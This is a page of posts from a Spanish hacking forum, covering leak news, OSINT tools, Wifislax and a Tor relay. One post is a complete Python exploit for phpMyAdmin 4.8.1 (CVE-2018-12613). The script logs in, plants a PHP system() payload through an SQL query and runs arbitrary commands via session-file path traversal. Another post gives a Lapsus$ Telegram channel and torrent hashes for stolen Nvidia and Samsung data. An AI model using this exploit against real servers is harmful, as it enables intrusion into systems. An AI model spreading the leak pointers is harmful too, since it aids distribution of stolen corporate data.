elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Temas
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 36
11  Seguridad Informática / Seguridad / Canal de Telegram Lapsus: datos privados de nvidia y Samsung en: 7 Marzo 2022, 12:44 pm
El canal de telegram de lapsus no tardará mucho en ser cerrado, después de publicar torrent 190GB de Samsung y otro torrent de nvidia

Lapsus$
https://t.me/minsaudebr

Allí podéis encontrar los dos torrents.

ID Torrent
cb2ae492a35c61272aa42f1ac11ea0ef496aecd6
nvidia

1107555fe207323098968f281f4c795f0cb180d4
Samsung

Otro canal de otro grupo muy activo últimamente es el de AgainstTheWest, que están publicando varios importantes hackeos, entre ellos Xiaomi

https://t.me/ATW2022
12  Seguridad Informática / Seguridad / Adiós a RaidForums: ahora es del FBI en: 7 Marzo 2022, 12:35 pm
El infame foro raidforums, dónde se publicaban abiertamente ventas de hackeos, robos de bases de datos, etc. ha sido confiscado por el FBI desde el 25 de febrero.

Lo que hay ahora es un login, que es básicamente un phishing del FBI, para obtener credenciales xD

Lo que ha sido raro es que RaidForums haya durado tanto, cuando se han publicado hackeos muy importantes con total normalidad.




13  Seguridad Informática / Hacking / Recopilación Herramientas OSINT en: 6 Enero 2022, 19:00 pm
 "Herramientas OSINT: Una recopilación de tools para obtener datos y convertirlos en ciberinteligencia"

Fuente:
https://derechodelared.com/herramientas-osint-recopilatorio/

🛠 Google Dorks https://www.exploit-db.com/google-hacking-database https://www.sans.org/security-resources/GoogleCheatSheet.pdf
🛠 Bing Dorks
🛠 Shodan https://www.shodan.io/
🛠 Maltego https://www.maltego.com/
🛠 TheHarvester https://github.com/laramies/theHarvester
🛠 Recon-ng https://github.com/lanmaster53/recon-ng
🛠 Censys https://censys.io/
🛠 Crt.sh https://crt.sh/
🛠 Creepy https://www.geocreepy.com/
🛠 DnsDumpster https://dnsdumpster.com/
🛠 Spyse https://spyse.com/
🛠 Metagoofil https://github.com/laramies/metagoofil
🛠 FOCA https://github.com/ElevenPaths/FOCA
🛠 Ipinfo.io https://ipinfo.io/
🛠 WaybackMachine (archive.org) https://archive.org/
🛠 Osintgram https://github.com/Datalux/Osintgram
🛠 Spiderfoot https://www.spiderfoot.net/
🛠 Google Imagenes (Búsqueda inversa)
🛠 Tinfoleak https://www.isecauditors.com/herramientas-tinfoleak
🛠 Wappalyzer https://www.wappalyzer.com/
🛠 OSINT Framework https://osintframework.com/
14  Foros Generales / Foro Libre / Primera extorsión del año con ataque DDoS incluido en: 4 Enero 2022, 16:05 pm
Internet sigue siendo una fuente de sorpresas....  ;-)  ;-)  ;-)

Usuario de México de  Twitter:

https://twitter.com/DOWN_DEAD01

Me escribe un mensaje privado:



Con una captura de otra página xDDD



Datos del Ataque DDoS recibido, total 17 millones peticiones:





Me recuerda a los argentinos que entraron al canal de telegram

@luckwarr
@Reflect0rx



 :laugh:
15  Informática / Tutoriales - Documentación / Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Malware, Herramientas, etc en: 30 Diciembre 2021, 12:57 pm
Tutoriales y Manuales



Tutoriales Análisis Malware

Tutoriales reversing


Tutoriales herramientas Hacking



Tutoriales Hacking Wireless



Tutoriales Herramientas Windows



Tutoriales Windows 11


Tutoriales administradores Windows



Tutoriales recuperación  
  
  
Tutoriales Seguridad y Redes




Tutoriales NAS


Tutoriales Multimedia


Tutoriales HoneyPot

Tutoriales Copias de Seguridad


Tutoriales Privacidad y Cifrado


Tutoriales Básicos de seguridad


Tutoriales para evitar ataques de ransomware


Tutoriales SyAdmin - Redes


Tutoriales Virtualización



Tutoriales sysadmins webmasters




Tutoriales de redes



Tutoriales Docker



Tutoriales y Manuales Linux


Tutoriales Hardware


Monitores - Gráficas

Discos Duros y Unidades SSD



Tutoriales RaspBerry Pi


Tutoriales Android


Descargas
16  Seguridad Informática / Bugs y Exploits / phpMyAdmin 4.8.1 - Remote Code Execution (RCE) CVE 2018-12613 en: 26 Diciembre 2021, 10:19 am
Código
  1. # Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)
  2. # Date: 17/08/2021
  3. # Exploit Author: samguy
  4. # Vulnerability Discovery By: ChaMd5 & Henry Huang
  5. # Vendor Homepage: http://www.phpmyadmin.net
  6. # Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz
  7. # Version: 4.8.1
  8. # Tested on: Linux - Debian Buster (PHP 7.3)
  9. # CVE : CVE-2018-12613
  10.  
  11. #!/usr/bin/env python
  12.  
  13. import re, requests, sys
  14.  
  15. # check python major version
  16. if sys.version_info.major == 3:
  17.  import html
  18. else:
  19.  from six.moves.html_parser import HTMLParser
  20.  html = HTMLParser()
  21.  
  22. if len(sys.argv) < 7:
  23.  usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]
  24. Example: {} 192.168.56.65 8080 /phpmyadmin username password whoami"""
  25.  print(usage.format(sys.argv[0],sys.argv[0]))
  26.  exit()
  27.  
  28. def get_token(content):
  29.  s = re.search('token"\s*value="(.*?)"', content)
  30.  token = html.unescape(s.group(1))
  31.  return token
  32.  
  33. ipaddr = sys.argv[1]
  34. port = sys.argv[2]
  35. path = sys.argv[3]
  36. username = sys.argv[4]
  37. password = sys.argv[5]
  38. command = sys.argv[6]
  39.  
  40. url = "http://{}:{}{}".format(ipaddr,port,path)
  41.  
  42. # 1st req: check login page and version
  43. url1 = url + "/index.php"
  44. r = requests.get(url1)
  45. content = r.content.decode('utf-8')
  46. if r.status_code != 200:
  47.  print("Unable to find the version")
  48.  exit()
  49.  
  50. s = re.search('PMA_VERSION:"(\d+\.\d+\.\d+)"', content)
  51. version = s.group(1)
  52. if version != "4.8.0" and version != "4.8.1":
  53.  print("The target is not exploitable".format(version))
  54.  exit()
  55.  
  56. # get 1st token and cookie
  57. cookies = r.cookies
  58. token = get_token(content)
  59.  
  60. # 2nd req: login
  61. p = {'token': token, 'pma_username': username, 'pma_password': password}
  62. r = requests.post(url1, cookies = cookies, data = p)
  63. content = r.content.decode('utf-8')
  64. s = re.search('logged_in:(\w+),', content)
  65. logged_in = s.group(1)
  66. if logged_in == "false":
  67.  print("Authentication failed")
  68.  exit()
  69.  
  70. # get 2nd token and cookie
  71. cookies = r.cookies
  72. token = get_token(content)
  73.  
  74. # 3rd req: execute query
  75. url2 = url + "/import.php"
  76. # payload
  77. payload = '''select '<?php system("{}") ?>';'''.format(command)
  78. p = {'table':'', 'token': token, 'sql_query': payload }
  79. r = requests.post(url2, cookies = cookies, data = p)
  80. if r.status_code != 200:
  81.  print("Query failed")
  82.  exit()
  83.  
  84. # 4th req: execute payload
  85. session_id = cookies.get_dict()['phpMyAdmin']
  86. url3 = url + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}".format(session_id)
  87. r = requests.get(url3, cookies = cookies)
  88. if r.status_code != 200:
  89.  print("Exploit failed")
  90.  exit()
  91.  
  92. # get result
  93. content = r.content.decode('utf-8', errors="replace")
  94. s = re.search("select '(.*?)\n'", content, re.DOTALL)
  95. if s != None:
  96.  print(s.group(1))
  97.  
17  Seguridad Informática / Hacking Wireless / Disponible Wifislax Edición Diciembre 2021 en: 21 Diciembre 2021, 18:03 pm

 
Wifislax 64 bits con kernel 5.15.10

Disponible nueva versión distro hacking Wireless
🔃Wifislax 64 con kernel 5.15.10

Módulos:
ℹ️Firefox 95
ℹ️Tor 11
ℹ️Websploit 4.0
ℹ️Kodi
ℹ️Wine
ℹ️Burp Suite
ℹ️LibreOffice

📁Descargar ISO = 2,28 GB
https://ns2.elhacker.net/isos/wifislax64-21122021.iso

📁Descargar ISO + Módulos = 5GB
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Descargar ISO 2,2GB
https://ns2.elhacker.net/isos/wifislax64-21122021.iso


Descargar ISO + Módulos 5GB
https://ns2.elhacker.net/isos/WIFISLAX-CURRENT-PLASMA.zip

Módulos:

Citar
HandBrake-1.4.2-x86_64-3wifislax.xzm  
Multilib-current-20-12-2021.xzm        
aegisub-kit-3.2.2-8wifislax.xzm        
ardour-kit-6.9-4wifislax.xzm  
audacity-3.0.2-x86_64-3wifislax.xzm    
avidemux-2.7.8-x86_64-10wifislax.xzm  
burpsuite-2021.12-noarch-1wifislax.xzm
ciano-kit-0.2.4-2wifislax.xzm
exaile-kit-4.1.1-10wifislax.xzm        
filezilla-kit-3.57.0-1wifislax.xzm    
firefox-95.0-x86_64-1wifislax.xzm      
four-in-a-row-kit-3.38.1-4wifislax.xzm
frostwire-6.9.5-noarch-1wifislax.xzm  
inkscape-kit-1.1.1-1wifislax.xzm      
jdownloader2-2.0-noarch-3wifislax.xzm  
kde-games-5.89.0-x86_64-1wifislax.xzm  
kodi-kit-19.2-3wifislax.xzm  
libreoffice-kit-7.2.4-x86_64-1wifislax.xzm
lives-kit-3.2.0-4wifislax.xzm
metasploit-kit-6.1.20-1wifislax.xzm    
mkvtoolnix-kit-60.0.0-1wifislax.xzm    
nvidia-current-470.63.01-20wifislax.xzm
pangzero-kit-1.4.1+git20121103-1wifislax.xzm      
pcsx2-kit-1.7.2040-2wifislax.xzm      
qbittorrent-kit-4.3.1-5wifislax.xzm    
shortwave-kit-1.1.1-2wifislax.xzm      
social-engineer-toolkit-8.0.3_80fe70d-x86_64-2wifislax.xzm
steam-1.0.0.74-x86_64-1wifislax.xzm    
teamviewer-15.24.5-x86_64-1wifislax.xzm
tor-browser-11.0a10-x86_64-1wifislax.xzm  
vlc-kit-3.0.16-14wifislax.xzm
vokoscreenNG-3.0.9-x86_64-2wifislax.xzm
websploit-4.0.4-x86_64-4wifislax.xzm
wine-kit-6.21-1wifislax.xzm  
worldofgoo-1.41-x86_64-2wifislax.xzm  
youtube-dl-kit-2021.06.06-3wifislax.xzm  
18  Seguridad Informática / Seguridad / Descuento cursos Securizame en: 24 Noviembre 2021, 00:13 am


Descuento será aplicable desde el Viernes 26 de Noviembre hasta
el Lunes 29 de Noviembre.

Este año regalaremos el acceso a uno de sus cursos online++

LLEGA EL BLACK FRIDAY 2021 Y SECURÍZAME OFRECE UN 25% DE DESCUENTO EN TODOS SUS CURSOS ONLINE, ONLINE++ Y PACKS ESPECIALIZADOS EN CIBERSEGURIDAD OFENSIVA Y DEFENSIVA

Securízame, una de las empresas españolas más reconocidas a nivel nacional e internacional en materia de ciberseguridad, de la mano de su CEO, Lorenzo Martínez Rodríguez, su gran plantilla de profesores y colaboradores, y la gran calidad de sus cursos, lleva casi 10 años ocupándose de la formación de profesionales, quienes encuentran en ella los medios y las oportunidades ideales
para complementar, mejorar y ampliar sus conocimientos.

A la hora de comprar el acceso a cualquiera de los cursos online desde la página de Securízame [http://cursos.securizame.com/?cursos-tag=Online%20] se verá el precio normal del curso. Una vez se lleva a cabo el registro en el mismo, se aplicará automáticamente el 25% de descuento en el precio, por lo que lo único que hay que hacer al momento del registro, es especificar en el campo de comentarios, para cuándo se quiere iniciar el curso.

Para completar el fin de semana de Black Friday, Securízame ha decidido regalar el acceso a uno de sus cursos online++: “Aplicación del modelo Zero Trust en AWS”

[https://www.securizame.com/nuevo-curso-online-aplicacion-del-modelo-zero-trust-
a-la-seguridad-corporativa-en-aws) a un agraciado entre todos aquellos que participen en la dinámica que han preparado por Twitter, además de que al comprar cualquiera de sus cursos, se obtiene una participación extra. Se podrá tener más información sobre cómo ganar este obsequio en el blog de su página web [https://www.securizame.com/news] y en sus redes sociales.

Citar
Estos descuentos Black Friday sólo son válidos a partir del Viernes 26 de noviembre de 2021 a las 00:00 hasta el Lunes 29 de noviembre de 2021 a las 23:59 en horario peninsular de España.
19  Seguridad Informática / Seguridad / Relay de elhacker.net en TOR en: 24 Noviembre 2021, 00:07 am
Para ayudar usuarios censurados puedan internet libre y sin censura en países como China y demás, uno de los servidores de descargas de elhacker.net (ns2.elhacker.net) es un nuevo relé de la red TOR:

De momento sin mucho tráfico, aunque va aumentando paulatinamente:
https://metrics.torproject.org/rs.html#details/F52611DA7E1EE1434C8B45368D0872C437A02958

El servidor tiene una conexión internet simétrica de 1Gbps con Adamo en Barcelona







Citar
Tor's uptime is 4 days 8:00 hours
I've sent 391.57 GB and received 386.46 GB.


He visto  algun nodo de tor que hace 5TB al día o más, una barbaridad. La suerte que es apenas consume CPU, ni disco duro, sólo tráfico de entrada y de salida (a partes iguales, aproximadamente).

No es un nodo de salida (Exit relaya), es un nodo intermedio y esperamos que sea un nodo guardián (de entrada) más adelante.

Quizás también pongamos el foro o la web en un dominio .onion próximamente.

Más información:
https://blog.torproject.org/run-a-bridge-campaign/

Red TOR: ¿qué es, cómo funciona y cómo se usa?
https://blog.elhacker.net/2021/11/red-tor-que-es-como-funciona-y-como-se-usa-relay-diferencias-nodos-cebolla.html

También un nuevo mirror de la distribución Tails (todo pasa por TOR) en:

https://tails.elhacker.net
20  Foros Generales / Foro Libre / Elon Musk está dispuesto a donar 6.000 millones de dólares para acabar con el hambre en el mundo a la ONU en: 23 Noviembre 2021, 23:57 pm
Elon Musk estaba dispuesto a donar 6.000 millones de dólares para acabar con el hambre en el mundo a la ONU si le garantizan que eso lo solucionaría, pero es ciertamente complicado

- Elon Musk retó a la ONU a que le mostrara cómo 6.000 millones de dólares (5.250 millones de euros) podrían combatir el hambre en el mundo.
- La ONU se ha dirigido a la persona más rica del mundo con una propuesta.
-Musk había declarado que "vendería las acciones de Tesla y lo haría" si la ONU pudiera mostrar cómo se gastaría ese dinero.

¿Alguien sabe cómo ha acabado el tema finalmente?

Fuentes:

ONU a Elon Musk: este es el plan de US$ 6.000 millones para acabar con la hambruna mundial
https://cnnespanol.cnn.com/2021/11/18/onu-elon-musk-plan-hambruna-mundial-trax/


La ONU responde al reto de Elon Musk: este es su plan de 6.600 millones de dólares para atajar el hambre en el mundo
https://www.businessinsider.es/plan-hambre-mundo-onu-respuesta-elon-musk-965453
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ... 36
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines